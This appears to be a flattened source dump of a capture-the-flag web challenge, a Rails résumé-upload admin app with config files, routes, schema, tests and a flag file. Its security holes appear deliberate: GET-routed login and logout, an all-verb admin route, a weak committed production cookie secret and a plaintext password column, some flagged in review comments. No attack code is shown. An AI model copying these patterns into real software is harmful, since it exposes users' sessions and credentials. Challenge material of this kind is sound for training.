2 | 3 | # Add new mime types for use in respond_to blocks: 4 | # Mime::Type.register "text/richtext", :rtf 5 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/new_framework_defaults.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | # 3 | # This file contains migration options to ease your Rails 5.0 upgrade. 4 | # 5 | # Read the Guide for Upgrading Ruby on Rails for more info on each option. 6 | 7 | Rails.application.config.action_controller.raise_on_unfiltered_parameters = true 8 | 9 | # Enable per-form CSRF tokens. Previous versions had false. 10 | Rails.application.config.action_controller.per_form_csrf_tokens = true 11 | 12 | # Enable origin-checking CSRF mitigation. Previous versions had false. 13 | Rails.application.config.action_controller.forgery_protection_origin_check = true 14 | 15 | # Make Ruby 2.4 preserve the timezone of the receiver when calling `to_time`. 16 | # Previous versions had false. 17 | ActiveSupport.to_time_preserves_timezone = true 18 | 19 | # Require `belongs_to` associations by default. Previous versions had false. 20 | Rails.application.config.active_record.belongs_to_required_by_default = true 21 | 22 | # Do not halt callback chains when a callback returns false. Previous versions had true. 23 | ActiveSupport.halt_callback_chains_on_return_false = false 24 | 25 | # Configure SSL options to enable HSTS with subdomains. Previous versions had false. 26 | Rails.application.config.ssl_options = { hsts: { subdomains: true } } 27 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/session_store.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 
2 | 3 | Rails.application.config.session_store :cookie_store, key: '_testapp_session' 4 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/wrap_parameters.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # This file contains settings for ActionController::ParamsWrapper which 4 | # is enabled by default. 5 | 6 | # Enable parameter wrapping for JSON. You can disable this by setting :format to an empty array. 7 | ActiveSupport.on_load(:action_controller) do 8 | wrap_parameters format: [:json] 9 | end 10 | 11 | # To enable root element in JSON for ActiveRecord objects. 12 | # ActiveSupport.on_load(:active_record) do 13 | # self.include_root_in_json = true 14 | # end 15 | -------------------------------------------------------------------------------- /web/RuAdmin/config/locales/en.yml: -------------------------------------------------------------------------------- 1 | # Files in the config/locales directory are used for internationalization 2 | # and are automatically loaded by Rails. If you want to use locales other 3 | # than English, add the necessary files in this directory. 4 | # 5 | # To use the locales, use `I18n.t`: 6 | # 7 | # I18n.t 'hello' 8 | # 9 | # In views, this is aliased to just `t`: 10 | # 11 | # <%= t('hello') %> 12 | # 13 | # To use a different locale, set it with `I18n.locale`: 14 | # 15 | # I18n.locale = :es 16 | # 17 | # This would use the information in config/locales/es.yml. 18 | # 19 | # To learn more, please read the Rails Internationalization guide 20 | # available at http://guides.rubyonrails.org/i18n.html. 
21 | 22 | en: 23 | hello: "Hello world" 24 | -------------------------------------------------------------------------------- /web/RuAdmin/config/puma.rb: -------------------------------------------------------------------------------- 1 | # Puma can serve each request in a thread from an internal thread pool. 2 | # The `threads` method setting takes two numbers a minimum and maximum. 3 | # Any libraries that use thread pools should be configured to match 4 | # the maximum value specified for Puma. Default is set to 5 threads for minimum 5 | # and maximum, this matches the default thread size of Active Record. 6 | # 7 | threads_count = ENV.fetch("RAILS_MAX_THREADS") { 5 }.to_i 8 | threads threads_count, threads_count 9 | 10 | # Specifies the `port` that Puma will listen on to receive requests, default is 3000. 11 | # 12 | port ENV.fetch("PORT") { 3000 } 13 | 14 | # Specifies the `environment` that Puma will run in. 15 | # 16 | environment ENV.fetch("RAILS_ENV") { "development" } 17 | 18 | # Specifies the number of `workers` to boot in clustered mode. 19 | # Workers are forked webserver processes. If using threads and workers together 20 | # the concurrency of the application would be max `threads` * `workers`. 21 | # Workers do not work on JRuby or Windows (both of which do not support 22 | # processes). 23 | # 24 | # workers ENV.fetch("WEB_CONCURRENCY") { 2 } 25 | 26 | # Use the `preload_app!` method when specifying a `workers` number. 27 | # This directive tells Puma to first boot the application and load code 28 | # before forking the application. This takes advantage of Copy On Write 29 | # process behavior so workers use less memory. If you use this option 30 | # you need to make sure to reconnect any threads in the `on_worker_boot` 31 | # block. 32 | # 33 | # preload_app! 34 | 35 | # The code in the `on_worker_boot` will be called if you are using 36 | # clustered mode by specifying a number of `workers`. 
After each worker 37 | # process is booted this block will be run, if you are using `preload_app!` 38 | # option you will want to use this block to reconnect to any threads 39 | # or connections that may have been created at application boot, Ruby 40 | # cannot share connections between processes. 41 | # 42 | # on_worker_boot do 43 | # ActiveRecord::Base.establish_connection if defined?(ActiveRecord) 44 | # end 45 | 46 | # Allow puma to be restarted by `rails restart` command. 47 | plugin :tmp_restart 48 | -------------------------------------------------------------------------------- /web/RuAdmin/config/routes.rb: -------------------------------------------------------------------------------- 1 | Rails.application.routes.draw do 2 | resources :resumes, only: [:index, :new, :create, :destroy] 3 | get "/upload", to: "resumes#index" 4 | # NOTE(review): '/' (sessions#create) and '/logout' (sessions#destroy) are routed as GET, and '/admin' accepts every verb (via: :all). Rails' CSRF token check does not apply to GET requests, so if these actions change session state they should be reachable only via POST/DELETE, and '/admin' limited to the verbs it needs. 5 | get '/', to: 'sessions#create', as: 'login' 6 | match '/admin', to: 'sessions#admin', via: :all 7 | get '/logout', to: 'sessions#destroy', as: 'logout' 8 | get '/home', to: 'home#index', as: 'home' 9 | resources :sessions 10 | # For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html 11 | end 12 | -------------------------------------------------------------------------------- /web/RuAdmin/config/secrets.yml: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Your secret key is used for verifying the integrity of signed cookies. 4 | # If you change this key, all old signed cookies will become invalid! 5 | 6 | # Make sure the secret is at least 30 characters and all random, 7 | # no regular words or you'll be exposed to dictionary attacks. 8 | # You can use `rails secret` to generate a secure secret key. 9 | 10 | # Make sure the secrets in this file are kept private 11 | # if you're sharing your code publicly.
12 | 13 | development: 14 | secret_key_base: 41b74af56fef2f474da3c1a39911e3ee64dae3d37804115e783e257a37b15aba62ec60d30eb52c35b3622997a742bedea8f2af85722003213138cf08a6296982 15 | 16 | test: 17 | secret_key_base: 93a9c36d61e924f5b0fa9015feba9c0953cbc75c5035cb5429271cd1ccad4d0b1789e4e5a5f17c61bc6c0eef9100e82fd0d0161a26dae03fa8ffba0b0ea3dc8c 18 | 19 | # Do not keep production secrets in the repository, 20 | # instead read values from the environment. NOTE(review): the production secret_key_base below is a literal committed with the code and does not look randomly generated; config/initializers/session_store.rb selects :cookie_store, so the integrity of every session cookie rests on this value staying private. Read it from the environment instead (secret_key_base: <%= ENV["SECRET_KEY_BASE"] %>) and rotate the committed value. 21 | production: 22 | secret_key_base: "AAADAJZEA1233'à))213312'adcc#:!,,:aeazaa" 23 | -------------------------------------------------------------------------------- /web/RuAdmin/config/spring.rb: -------------------------------------------------------------------------------- 1 | %w( 2 | .ruby-version 3 | .rbenv-vars 4 | tmp/restart.txt 5 | tmp/caching-dev.txt 6 | ).each { |path| Spring.watch(path) } 7 | -------------------------------------------------------------------------------- /web/RuAdmin/db/migrate/20180822104110_create_users.rb: -------------------------------------------------------------------------------- 1 | class CreateUsers < ActiveRecord::Migration[5.0] 2 | def change 3 | create_table :users do |t| 4 | t.string :username 5 | t.string :password_digest 6 | 7 | t.timestamps 8 | end 9 | end 10 | end 11 | -------------------------------------------------------------------------------- /web/RuAdmin/db/migrate/20180822113826_create_resumes.rb: -------------------------------------------------------------------------------- 1 | class CreateResumes < ActiveRecord::Migration[5.0] 2 | def change 3 | create_table :resumes do |t| 4 | t.string :name 5 | t.string :attachment 6 | 7 | t.timestamps 8 | end 9 | end 10 | end 11 | -------------------------------------------------------------------------------- /web/RuAdmin/db/schema.rb: -------------------------------------------------------------------------------- 1 | # This file is auto-generated from the current state of the database.
Instead 2 | # of editing this file, please use the migrations feature of Active Record to 3 | # incrementally modify your database, and then regenerate this schema definition. 4 | # 5 | # Note that this schema.rb definition is the authoritative source for your 6 | # database schema. If you need to create the application database on another 7 | # system, you should be using db:schema:load, not running all the migrations 8 | # from scratch. The latter is a flawed and unsustainable approach (the more migrations 9 | # you'll amass, the slower it'll run and the greater likelihood for issues). 10 | # 11 | # It's strongly recommended that you check this file into your version control system. 12 | 13 | ActiveRecord::Schema.define(version: 20180822113826) do 14 | 15 | create_table "resumes", force: :cascade, options: "ENGINE=InnoDB DEFAULT CHARSET=utf8" do |t| 16 | t.string "name" 17 | t.string "attachment" 18 | t.datetime "created_at", null: false 19 | t.datetime "updated_at", null: false 20 | end 21 | # NOTE(review): this users table does not match db/migrate/20180822104110_create_users.rb, which creates username, password_digest and timestamps; here the columns are username, a plain string "password" and isadmin. If "password" holds the credential as entered, store a salted hash instead (a password_digest column with has_secure_password) - confirm against app/models/user.rb. isadmin is nullable with no default; consider default: false, null: false. 22 | create_table "users", force: :cascade, options: "ENGINE=InnoDB DEFAULT CHARSET=utf8" do |t| 23 | t.string "username" 24 | t.string "password" 25 | t.boolean "isadmin" 26 | end 27 | 28 | end 29 | -------------------------------------------------------------------------------- /web/RuAdmin/db/seeds.rb: -------------------------------------------------------------------------------- 1 | # This file should contain all the record creation needed to seed the database with its default values. 2 | # The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
3 | # 4 | # Examples: 5 | # 6 | # movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }]) 7 | # Character.create(name: 'Luke', movie: movies.first) 8 | -------------------------------------------------------------------------------- /web/RuAdmin/fl4g_is_h3re/flag.txt: -------------------------------------------------------------------------------- 1 | flag{ you found the fl4g gratz } 2 | -------------------------------------------------------------------------------- /web/RuAdmin/lib/assets/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/lib/assets/.keep -------------------------------------------------------------------------------- /web/RuAdmin/lib/tasks/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/lib/tasks/.keep -------------------------------------------------------------------------------- /web/RuAdmin/log/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/log/.keep -------------------------------------------------------------------------------- /web/RuAdmin/public/404.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | The page you were looking for doesn't exist (404) 5 | 6 | 55 | 56 | 57 | 58 | 59 |
60 |
61 |

The page you were looking for doesn't exist.

62 |

You may have mistyped the address or the page may have moved.

63 |
64 |

If you are the application owner check the logs for more information.

65 |
66 | 67 | 68 | -------------------------------------------------------------------------------- /web/RuAdmin/public/422.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | The change you wanted was rejected (422) 5 | 6 | 55 | 56 | 57 | 58 | 59 |
60 |
61 |

The change you wanted was rejected.

62 |

Maybe you tried to change something you didn't have access to.

63 |
64 |

If you are the application owner check the logs for more information.

65 |
66 | 67 | 68 | -------------------------------------------------------------------------------- /web/RuAdmin/public/500.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | We're sorry, but something went wrong (500) 5 | 6 | 55 | 56 | 57 | 58 | 59 |
60 |
61 |

We're sorry, but something went wrong.

62 |
63 |

If you are the application owner check the logs for more information.

64 |
65 | 66 | 67 | -------------------------------------------------------------------------------- /web/RuAdmin/public/apple-touch-icon-precomposed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/public/apple-touch-icon-precomposed.png -------------------------------------------------------------------------------- /web/RuAdmin/public/apple-touch-icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/public/apple-touch-icon.png -------------------------------------------------------------------------------- /web/RuAdmin/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/public/favicon.ico -------------------------------------------------------------------------------- /web/RuAdmin/public/public/uploads/resumes/hax.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/public/public/uploads/resumes/hax.c -------------------------------------------------------------------------------- /web/RuAdmin/public/robots.txt: -------------------------------------------------------------------------------- 1 | # See http://www.robotstxt.org/robotstxt.html for documentation on how to use the robots.txt file 2 | # 3 | # To ban all spiders from the entire site uncomment the next two lines: 4 | # User-agent: * 5 | # Disallow: / 6 | -------------------------------------------------------------------------------- /web/RuAdmin/test/controllers/.keep: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/test/controllers/.keep -------------------------------------------------------------------------------- /web/RuAdmin/test/controllers/resumes_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class ResumesControllerTest < ActionDispatch::IntegrationTest 4 | test "should get index" do 5 | get resumes_index_url 6 | assert_response :success 7 | end 8 | 9 | test "should get new" do 10 | get resumes_new_url 11 | assert_response :success 12 | end 13 | 14 | test "should get create" do 15 | get resumes_create_url 16 | assert_response :success 17 | end 18 | 19 | test "should get destroy" do 20 | get resumes_destroy_url 21 | assert_response :success 22 | end 23 | 24 | end 25 | -------------------------------------------------------------------------------- /web/RuAdmin/test/controllers/sessions_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class SessionsControllerTest < ActionDispatch::IntegrationTest 4 | test "should get new" do 5 | get sessions_new_url 6 | assert_response :success 7 | end 8 | 9 | end 10 | -------------------------------------------------------------------------------- /web/RuAdmin/test/controllers/users_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class UsersControllerTest < ActionDispatch::IntegrationTest 4 | # test "the truth" do 5 | # assert true 6 | # end 7 | end 8 | -------------------------------------------------------------------------------- /web/RuAdmin/test/fixtures/.keep: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/test/fixtures/.keep -------------------------------------------------------------------------------- /web/RuAdmin/test/fixtures/files/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/test/fixtures/files/.keep -------------------------------------------------------------------------------- /web/RuAdmin/test/fixtures/resumes.yml: -------------------------------------------------------------------------------- 1 | # Read about fixtures at http://api.rubyonrails.org/classes/ActiveRecord/FixtureSet.html 2 | 3 | one: 4 | name: MyString 5 | attachment: MyString 6 | 7 | two: 8 | name: MyString 9 | attachment: MyString 10 | -------------------------------------------------------------------------------- /web/RuAdmin/test/fixtures/users.yml: -------------------------------------------------------------------------------- 1 | # Read about fixtures at http://api.rubyonrails.org/classes/ActiveRecord/FixtureSet.html 2 | 3 | one: 4 | username: MyString 5 | password_digest: MyString 6 | 7 | two: 8 | username: MyString 9 | password_digest: MyString 10 | -------------------------------------------------------------------------------- /web/RuAdmin/test/helpers/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/test/helpers/.keep -------------------------------------------------------------------------------- /web/RuAdmin/test/integration/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/test/integration/.keep 
-------------------------------------------------------------------------------- /web/RuAdmin/test/mailers/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/test/mailers/.keep -------------------------------------------------------------------------------- /web/RuAdmin/test/models/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/test/models/.keep -------------------------------------------------------------------------------- /web/RuAdmin/test/models/resume_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class ResumeTest < ActiveSupport::TestCase 4 | # test "the truth" do 5 | # assert true 6 | # end 7 | end 8 | -------------------------------------------------------------------------------- /web/RuAdmin/test/models/user_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class UserTest < ActiveSupport::TestCase 4 | # test "the truth" do 5 | # assert true 6 | # end 7 | end 8 | -------------------------------------------------------------------------------- /web/RuAdmin/test/test_helper.rb: -------------------------------------------------------------------------------- 1 | ENV['RAILS_ENV'] ||= 'test' 2 | require File.expand_path('../../config/environment', __FILE__) 3 | require 'rails/test_help' 4 | 5 | class ActiveSupport::TestCase 6 | # Setup all fixtures in test/fixtures/*.yml for all tests in alphabetical order. 7 | fixtures :all 8 | 9 | # Add more helper methods to be used by all tests here... 
10 | end 11 | -------------------------------------------------------------------------------- /web/RuAdmin/tmp/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/tmp/.keep -------------------------------------------------------------------------------- /web/RuAdmin/vendor/assets/javascripts/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/vendor/assets/javascripts/.keep -------------------------------------------------------------------------------- /web/RuAdmin/vendor/assets/stylesheets/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/vendor/assets/stylesheets/.keep --------------------------------------------------------------------------------